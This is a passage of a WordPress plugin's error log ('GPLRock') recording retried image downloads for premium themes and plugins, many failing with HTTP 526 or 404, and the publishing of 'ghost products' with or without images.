eight-responsive-portfolio-wordpress-theme [04-Apr-2026 11:11:46 UTC] GPLRock: Image download failed for product copygen-ai-writer-copywriting-landing-page-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:11:49 UTC] GPLRock: Image download failed for product copygen-ai-writer-copywriting-landing-page-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:11:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/copygen---ai-writer--copywriting-landing-page-wordpress-theme-16600.webp for product copygen-ai-writer-copywriting-landing-page-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:11:51 UTC] GPLRock: Image download failed for product copygen-ai-writer-copywriting-landing-page-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:11:53 UTC] GPLRock: Image download failed for product copygen-ai-writer-copywriting-landing-page-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:11:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/copygen---ai-writer--copywriting-landing-page-wordpress-theme-16600.webp for product copygen-ai-writer-copywriting-landing-page-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:11:55 UTC] GPLRock WARNING: Image download failed for product copygen-ai-writer-copywriting-landing-page-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/copygen---ai-writer--copywriting-landing-page-wordpress-theme-16600.webp [04-Apr-2026 11:11:55 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: copygen-ai-writer-copywriting-landing-page-wordpress-theme [04-Apr-2026 11:11:55 UTC] GPLRock: Image download failed for product konte-minimal-modern-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:11:57 UTC] GPLRock: Image download failed for product konte-minimal-modern-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:11:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/konte---minimal--modern-woocommerce-wordpress-theme-3224.webp for product konte-minimal-modern-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:11:59 UTC] GPLRock: Image download failed for product konte-minimal-modern-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:12:02 UTC] GPLRock: Image download failed for product konte-minimal-modern-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:12:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/konte---minimal--modern-woocommerce-wordpress-theme-3224.webp for product konte-minimal-modern-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:12:04 UTC] GPLRock WARNING: Image download failed for product konte-minimal-modern-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/konte---minimal--modern-woocommerce-wordpress-theme-3224.webp [04-Apr-2026 11:12:04 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: konte-minimal-modern-woocommerce-wordpress-theme [04-Apr-2026 11:12:57 UTC] GPLRock: Image downloaded successfully for product denso-advanced-electronics-store-woocommerce-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3020a0b9.jpg [04-Apr-2026 11:12:57 UTC] GPLRock: Using pre-downloaded image for product denso-advanced-electronics-store-woocommerce-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3020a0b9.jpg [04-Apr-2026 11:12:57 UTC] GPLRock: Ghost product published with image - Product ID: denso-advanced-electronics-store-woocommerce-wordpress-theme [04-Apr-2026 11:12:59 UTC] GPLRock: Image downloaded successfully for product epic-news-elements-elementor-wpbakery-add-ons (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-bc597eaf.jpg [04-Apr-2026 11:12:59 UTC] GPLRock: Using pre-downloaded image for product epic-news-elements-elementor-wpbakery-add-ons: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-bc597eaf.jpg [04-Apr-2026 11:12:59 UTC] GPLRock: Ghost product published with image - Product ID: epic-news-elements-elementor-wpbakery-add-ons [04-Apr-2026 11:13:01 UTC] GPLRock: Image downloaded successfully for product braga-fashion-theme-for-woocommerce-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-74f01918.jpg [04-Apr-2026 11:13:01 UTC] GPLRock: Using pre-downloaded image for product braga-fashion-theme-for-woocommerce-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-74f01918.jpg [04-Apr-2026 11:13:01 UTC] GPLRock: Ghost product published with image - Product ID: braga-fashion-theme-for-woocommerce-wordpress [04-Apr-2026 11:13:03 UTC] GPLRock: Image downloaded successfully for product speaker-page-to-speech-plugin-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8913fd17.jpg [04-Apr-2026 11:13:03 UTC] GPLRock: Using pre-downloaded image for product speaker-page-to-speech-plugin-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8913fd17.jpg [04-Apr-2026 11:13:03 UTC] GPLRock: Ghost product published with image - Product ID: speaker-page-to-speech-plugin-for-wordpress [04-Apr-2026 11:13:06 UTC] GPLRock: Image downloaded successfully for product pinevale-addiction-recovery-and-rehabilitation-center-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-20c50c6b.png [04-Apr-2026 11:13:06 UTC] GPLRock: Using pre-downloaded image for product pinevale-addiction-recovery-and-rehabilitation-center-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-20c50c6b.png [04-Apr-2026 11:13:06 UTC] GPLRock: Ghost product published with image - Product ID: pinevale-addiction-recovery-and-rehabilitation-center-wordpress-theme [04-Apr-2026 11:13:08 UTC] GPLRock: Image downloaded successfully for product aduma-consulting-finance-business-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5a69eb72.jpg [04-Apr-2026 11:13:08 UTC] GPLRock: Using pre-downloaded image for product aduma-consulting-finance-business-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5a69eb72.jpg [04-Apr-2026 11:13:08 UTC] GPLRock: Ghost product published with image - Product ID: aduma-consulting-finance-business-wordpress-theme [04-Apr-2026 11:13:10 UTC] GPLRock: Image downloaded successfully for product amos-creative-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1685ed09.jpg [04-Apr-2026 11:13:10 UTC] GPLRock: Using pre-downloaded image for product amos-creative-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1685ed09.jpg [04-Apr-2026 11:13:10 UTC] GPLRock: Ghost product published with image - Product ID: amos-creative-wordpress [04-Apr-2026 11:13:11 UTC] GPLRock: Image downloaded successfully for product easy-digital-downloads-download-image-watermark (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-46eddb49.jpg [04-Apr-2026 11:13:11 UTC] GPLRock: Using pre-downloaded image for product easy-digital-downloads-download-image-watermark: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-46eddb49.jpg [04-Apr-2026 11:13:11 UTC] GPLRock: Ghost product published with image - Product ID: easy-digital-downloads-download-image-watermark [04-Apr-2026 11:13:12 UTC] GPLRock: Image downloaded successfully for product amp-stories (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-afd0a618.png [04-Apr-2026 11:13:13 UTC] GPLRock: Using pre-downloaded image for product amp-stories: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-afd0a618.png [04-Apr-2026 11:13:13 UTC] GPLRock: Ghost product published with image - Product ID: amp-stories [04-Apr-2026 11:13:14 UTC] GPLRock: Image downloaded successfully for product promosys-promotion-services-multi-purpose-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-eaf48ca2.jpg [04-Apr-2026 11:13:14 UTC] GPLRock: Using pre-downloaded image for product promosys-promotion-services-multi-purpose-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-eaf48ca2.jpg [04-Apr-2026 11:13:14 UTC] GPLRock: Ghost product published with image - Product ID: promosys-promotion-services-multi-purpose-wordpress-theme [04-Apr-2026 11:14:59 UTC] GPLRock: Image download failed for product upland-responsive-app-landing-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:15:01 UTC] GPLRock: Image download failed for product upland-responsive-app-landing-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:15:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/upland---responsive-app-landing-theme-24983.webp for product upland-responsive-app-landing-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:15:04 UTC] GPLRock: Image download failed for product upland-responsive-app-landing-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:15:06 UTC] GPLRock: Image download failed for product upland-responsive-app-landing-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:15:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/upland---responsive-app-landing-theme-24983.webp for product upland-responsive-app-landing-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:15:08 UTC] GPLRock WARNING: Image download failed for product upland-responsive-app-landing-theme. URL: https://meldwp.com/wp-content/uploads/upland---responsive-app-landing-theme-24983.webp [04-Apr-2026 11:15:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: upland-responsive-app-landing-theme [04-Apr-2026 11:15:08 UTC] GPLRock: Image download failed for product patholab-laboratory-science-research-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:15:10 UTC] GPLRock: Image download failed for product patholab-laboratory-science-research-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:15:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/patholab---laboratory--science-research-wordpress-theme-17976.webp for product patholab-laboratory-science-research-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:15:12 UTC] GPLRock: Image download failed for product patholab-laboratory-science-research-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:15:14 UTC] GPLRock: Image download failed for product patholab-laboratory-science-research-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:15:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/patholab---laboratory--science-research-wordpress-theme-17976.webp for product patholab-laboratory-science-research-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:15:16 UTC] GPLRock WARNING: Image download failed for product patholab-laboratory-science-research-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/patholab---laboratory--science-research-wordpress-theme-17976.webp [04-Apr-2026 11:15:16 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: patholab-laboratory-science-research-wordpress-theme [04-Apr-2026 11:15:17 UTC] GPLRock: Image downloaded successfully for product printspace-printing-services-design-online-woocommerce-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ea40d50c.webp [04-Apr-2026 11:15:17 UTC] GPLRock: Using pre-downloaded image for product printspace-printing-services-design-online-woocommerce-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ea40d50c.webp [04-Apr-2026 11:15:17 UTC] GPLRock: Ghost product published with image - Product ID: printspace-printing-services-design-online-woocommerce-wordpress-theme [04-Apr-2026 11:15:17 UTC] GPLRock: Image download failed for product auror-blog-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:15:19 UTC] GPLRock: Image download failed for product auror-blog-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:15:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/auror--blog-magazine-wordpress-theme-9577.webp for product auror-blog-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:15:21 UTC] GPLRock: Image download failed for product auror-blog-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:15:23 UTC] GPLRock: Image download failed for product auror-blog-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:15:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/auror--blog-magazine-wordpress-theme-9577.webp for product auror-blog-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:15:25 UTC] GPLRock WARNING: Image download failed for product auror-blog-magazine-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/auror--blog-magazine-wordpress-theme-9577.webp [04-Apr-2026 11:15:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: auror-blog-magazine-wordpress-theme [04-Apr-2026 11:15:25 UTC] GPLRock: Image download failed for product modesto-photography-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:15:27 UTC] GPLRock: Image download failed for product modesto-photography-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:15:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/modesto---photography-portfolio-wordpress-theme-22525.webp for product modesto-photography-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:15:30 UTC] GPLRock: Image download failed for product modesto-photography-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:15:32 UTC] GPLRock: Image download failed for product modesto-photography-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:15:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/modesto---photography-portfolio-wordpress-theme-22525.webp for product modesto-photography-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:15:34 UTC] GPLRock WARNING: Image download failed for product modesto-photography-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/modesto---photography-portfolio-wordpress-theme-22525.webp [04-Apr-2026 11:15:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: modesto-photography-portfolio-wordpress-theme [04-Apr-2026 11:15:34 UTC] GPLRock: Image download failed for product susastho-health-and-yoga-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:15:36 UTC] GPLRock: Image download failed for product susastho-health-and-yoga-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:15:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/susastho---health-and-yoga-wordpress-theme-22347.webp for product susastho-health-and-yoga-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:15:38 UTC] GPLRock: Image download failed for product susastho-health-and-yoga-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:15:40 UTC] GPLRock: Image download failed for product susastho-health-and-yoga-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:15:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/susastho---health-and-yoga-wordpress-theme-22347.webp for product susastho-health-and-yoga-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:15:42 UTC] GPLRock WARNING: Image download failed for product susastho-health-and-yoga-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/susastho---health-and-yoga-wordpress-theme-22347.webp [04-Apr-2026 11:15:42 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: susastho-health-and-yoga-wordpress-theme [04-Apr-2026 11:15:43 UTC] GPLRock: Image download failed for product bebicare-babysitter-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:15:45 UTC] GPLRock: Image download failed for product bebicare-babysitter-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:15:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bebicare---babysitter-wordpress-theme-12211.webp for product bebicare-babysitter-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:15:47 UTC] GPLRock: Image download failed for product bebicare-babysitter-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:15:49 UTC] GPLRock: Image download failed for product bebicare-babysitter-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:15:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bebicare---babysitter-wordpress-theme-12211.webp for product bebicare-babysitter-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:15:51 UTC] GPLRock WARNING: Image download failed for product bebicare-babysitter-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/bebicare---babysitter-wordpress-theme-12211.webp [04-Apr-2026 11:15:51 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bebicare-babysitter-wordpress-theme [04-Apr-2026 11:15:51 UTC] GPLRock: Image downloaded successfully for product roast-coffee-shop-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6389590d.webp [04-Apr-2026 11:15:51 UTC] GPLRock: Using pre-downloaded image for product roast-coffee-shop-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6389590d.webp [04-Apr-2026 11:15:51 UTC] GPLRock: Ghost product published with image - Product ID: roast-coffee-shop-wordpress-theme [04-Apr-2026 11:15:51 UTC] GPLRock: Image download failed for product eventim-conference-wedding-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:15:54 UTC] GPLRock: Image download failed for product eventim-conference-wedding-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:15:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/eventim---conference--wedding-wordpress-theme-27706.webp for product eventim-conference-wedding-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:15:56 UTC] GPLRock: Image download failed for product eventim-conference-wedding-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:15:58 UTC] GPLRock: Image download failed for product eventim-conference-wedding-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:16:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/eventim---conference--wedding-wordpress-theme-27706.webp for product eventim-conference-wedding-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:16:00 UTC] GPLRock WARNING: Image download failed for product eventim-conference-wedding-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/eventim---conference--wedding-wordpress-theme-27706.webp [04-Apr-2026 11:16:00 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: eventim-conference-wedding-wordpress-theme [04-Apr-2026 11:16:00 UTC] GPLRock: Image download failed for product dermis-medical-doctor-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:16:02 UTC] GPLRock: Image download failed for product dermis-medical-doctor-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:16:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dermis---medical-doctor-wordpress-theme-18819.webp for product dermis-medical-doctor-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:16:04 UTC] GPLRock: Image download failed for product dermis-medical-doctor-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:16:06 UTC] GPLRock: Image download failed for product dermis-medical-doctor-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:16:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dermis---medical-doctor-wordpress-theme-18819.webp for product dermis-medical-doctor-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:16:09 UTC] GPLRock WARNING: Image download failed for product dermis-medical-doctor-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/dermis---medical-doctor-wordpress-theme-18819.webp [04-Apr-2026 11:16:09 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: dermis-medical-doctor-wordpress-theme [04-Apr-2026 11:19:12 UTC] GPLRock: Image downloaded successfully for product whmpress-whmcs-wordpress-integration-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-42bc3047.jpg [04-Apr-2026 11:19:12 UTC] GPLRock: Using pre-downloaded image for product whmpress-whmcs-wordpress-integration-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-42bc3047.jpg [04-Apr-2026 11:19:12 UTC] GPLRock: Ghost product published with image - Product ID: whmpress-whmcs-wordpress-integration-plugin [04-Apr-2026 11:19:15 UTC] GPLRock: Image download failed for product ultimate-addons-for-beaver-builder (attempt 1/3). HTTP Code: 404, Error: . Retrying... [04-Apr-2026 11:19:19 UTC] GPLRock: Image download failed for product ultimate-addons-for-beaver-builder (attempt 2/3). HTTP Code: 404, Error: . Retrying... [04-Apr-2026 11:19:23 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2020/08/Ultimate-Addons-for-Beaver-Builder.jpg for product ultimate-addons-for-beaver-builder after 3 attempts. HTTP Code: 404, Error: [04-Apr-2026 11:19:26 UTC] GPLRock: Image download failed for product ultimate-addons-for-beaver-builder (attempt 1/3). HTTP Code: 404, Error: . Retrying... [04-Apr-2026 11:19:30 UTC] GPLRock: Image download failed for product ultimate-addons-for-beaver-builder (attempt 2/3). HTTP Code: 404, Error: . Retrying... [04-Apr-2026 11:19:34 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2020/08/Ultimate-Addons-for-Beaver-Builder.jpg for product ultimate-addons-for-beaver-builder after 3 attempts. HTTP Code: 404, Error: [04-Apr-2026 11:19:34 UTC] GPLRock WARNING: Image download failed for product ultimate-addons-for-beaver-builder. URL: https://www.gplrock.com/wp-content/uploads/2020/08/Ultimate-Addons-for-Beaver-Builder.jpg [04-Apr-2026 11:19:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ultimate-addons-for-beaver-builder [04-Apr-2026 11:19:35 UTC] GPLRock: Image downloaded successfully for product geodirectory-pricing-payment-manager (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c7791ad9.jpg [04-Apr-2026 11:19:35 UTC] GPLRock: Using pre-downloaded image for product geodirectory-pricing-payment-manager: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c7791ad9.jpg [04-Apr-2026 11:19:35 UTC] GPLRock: Ghost product published with image - Product ID: geodirectory-pricing-payment-manager [04-Apr-2026 11:19:37 UTC] GPLRock: Image downloaded successfully for product geodirectory-franchise-manager (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-04120e7d.jpg [04-Apr-2026 11:19:37 UTC] GPLRock: Using pre-downloaded image for product geodirectory-franchise-manager: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-04120e7d.jpg [04-Apr-2026 11:19:37 UTC] GPLRock: Ghost product published with image - Product ID: geodirectory-franchise-manager [04-Apr-2026 11:19:38 UTC] GPLRock: Image downloaded successfully for product geodirectory-claim-listings (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-84d26a18.jpg [04-Apr-2026 11:19:38 UTC] GPLRock: Using pre-downloaded image for product geodirectory-claim-listings: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-84d26a18.jpg [04-Apr-2026 11:19:38 UTC] GPLRock: Ghost product published with image - Product ID: geodirectory-claim-listings [04-Apr-2026 11:19:40 UTC] GPLRock: Image downloaded successfully for product sensei-with-woocommerce-paid-courses (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d24182c1.jpg [04-Apr-2026 11:19:40 UTC] GPLRock: Using pre-downloaded image for product sensei-with-woocommerce-paid-courses: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d24182c1.jpg [04-Apr-2026 11:19:40 UTC] GPLRock: Ghost product published with image - Product ID: sensei-with-woocommerce-paid-courses [04-Apr-2026 11:19:41 UTC] GPLRock: Image downloaded successfully for product facetwp-range-list (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-de3e3819.jpg [04-Apr-2026 11:19:41 UTC] GPLRock: Using pre-downloaded image for product facetwp-range-list: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-de3e3819.jpg [04-Apr-2026 11:19:41 UTC] GPLRock: Ghost product published with image - Product ID: facetwp-range-list [04-Apr-2026 11:19:43 UTC] GPLRock: Image downloaded successfully for product super-forms-calculator (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-96913ba1.jpg [04-Apr-2026 11:19:43 UTC] GPLRock: Using pre-downloaded image for product super-forms-calculator: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-96913ba1.jpg [04-Apr-2026 11:19:43 UTC] GPLRock: Ghost product published with image - Product ID: super-forms-calculator [04-Apr-2026 11:19:44 UTC] GPLRock: Image downloaded successfully for product gravity-forms-zoho-crm-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2e979f55.jpg [04-Apr-2026 11:19:44 UTC] GPLRock: Using pre-downloaded image for product gravity-forms-zoho-crm-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2e979f55.jpg [04-Apr-2026 11:19:44 UTC] GPLRock: Ghost product published with image - Product ID: gravity-forms-zoho-crm-addon [04-Apr-2026 11:19:46 UTC] GPLRock: Image downloaded successfully for product woocommerce-product-catalog-mode-enquiry-form (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f4c5fb31.jpg [04-Apr-2026 11:19:46 UTC] GPLRock: Using pre-downloaded image for product woocommerce-product-catalog-mode-enquiry-form: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f4c5fb31.jpg [04-Apr-2026 11:19:46 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-product-catalog-mode-enquiry-form [04-Apr-2026 11:25:46 UTC] GPLRock: Image downloaded successfully for product paperino-garage-mechanic-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-21e9d9b2.webp [04-Apr-2026 11:25:46 UTC] GPLRock: Using pre-downloaded image for product paperino-garage-mechanic-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-21e9d9b2.webp [04-Apr-2026 11:25:46 UTC] GPLRock: Ghost product published with image - Product ID: paperino-garage-mechanic-elementor-template-kit [04-Apr-2026 11:25:47 UTC] GPLRock: Image downloaded successfully for product pangke-barbershop-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-49d218f5.jpg [04-Apr-2026 11:25:48 UTC] GPLRock: Using pre-downloaded image for product pangke-barbershop-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-49d218f5.jpg [04-Apr-2026 11:25:48 UTC] GPLRock: Ghost product published with image - Product ID: pangke-barbershop-template-kit [04-Apr-2026 11:25:49 UTC] GPLRock: Image downloaded successfully for product palazo-hotel-and-resort-booking-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1f603c87.webp [04-Apr-2026 11:25:49 UTC] GPLRock: Using pre-downloaded image for product palazo-hotel-and-resort-booking-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1f603c87.webp [04-Apr-2026 11:25:49 UTC] GPLRock: Ghost product published with image - Product ID: palazo-hotel-and-resort-booking-elementor-template-kit [04-Apr-2026 11:25:51 UTC] GPLRock: Image downloaded successfully for product pajax-tax-advisor-financial-consulting-elementor-template-kit (attempt 1) 